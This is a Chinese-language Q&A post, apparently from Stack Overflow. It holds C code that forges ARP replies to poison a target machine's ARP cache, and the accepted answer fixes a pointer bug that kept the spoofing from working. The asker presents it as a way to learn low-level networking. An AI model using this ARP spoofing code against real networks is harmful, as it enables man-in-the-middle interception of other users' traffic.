我试图在linux上用c编写一个简单的arp欺骗程序(主要是为了更好地理解低级网络)。
到目前为止,我已经成功地创建了一个arp请求,并使用目标和网关的mac地址获得了arp回复,但是每当我向目标/网关发送arp回复时,我的测试计算机上的arp表都没有更新,它仍然显示正确的网关mac地址。这不是网络问题,因为kali linux arpsoof命令工作正常,arp缓存正在更新。
这是我发送伪造arp数据包的代码:
void arp_spoof(int sock, LOCAL_DATA localData, uint32_t pdst, unsigned char hwdst[6], uint32_t psrc)
{
struct ether_arp arpPacket;
struct sockaddr_ll addr = {0};
addr.sll_family = AF_PACKET;
addr.sll_ifindex = localData.interface_index;
addr.sll_halen = ETHER_ADDR_LEN;
addr.sll_protocol = htons(ETH_P_ARP);
memcpy(addr.sll_addr, &hwdst, ETHER_ADDR_LEN); // destination physical address
// basic info about the arp packet
arpPacket.arp_hrd = htons(ARPHRD_ETHER);
arpPacket.arp_pro = htons(ETH_P_IP);
arpPacket.arp_hln = ETHER_ADDR_LEN;
arpPacket.arp_pln = sizeof(in_addr_t);
arpPacket.arp_op = htons(ARPOP_REPLY);
/*======== Resulting Structure ========
Source MAC : local mac (attacker)
Source IP : ip of the machine attacker wants
destination machine to believe is the source
Destination MAC : real destination physical address
Destination IP : real destination ip address
======================================*/
// Source MAC [REAL]
memcpy(&arpPacket.arp_sha, localData.mac_address, sizeof(arpPacket.arp_sha));
// Source IP [SPOOFED / FAKE]
memcpy(&arpPacket.arp_spa, &psrc, sizeof(arpPacket.arp_spa));
// Destination MAC [REAL]
memcpy(&arpPacket.arp_tha, hwdst, sizeof(arpPacket.arp_tha));
// Destination ip [REAL]
memcpy(&arpPacket.arp_tpa, &pdst, sizeof(arpPacket.arp_tpa));
// sending the packet to the target
if (sendto(sock, &arpPacket, sizeof(arpPacket), 0, (struct sockaddr*)&addr, sizeof(addr)) == -1) {
printf("Error arp spoofing target: ");
PrintIpAddress(pdst);
}
最佳答案
我在密码里犯了个愚蠢的错误。
在下面一行:memcpy(addr.sll_addr, &hwdst, ETHER_ADDR_LEN);
我把指向指针的指针作为参数&hwdst
。因为hdwst
已经是参数中的一个数组,所以它只需要指向第一个元素的指针。
正确的行应该是:memcpy(addr.sll_addr, hwdst, ETHER_ADDR_LEN);
关于c - 在Linux上的C中进行arp欺骗时,目标计算机的arp缓存未更新,我们在Stack Overflow上找到一个类似的问题:https://stackoverflow.com/questions/52411199/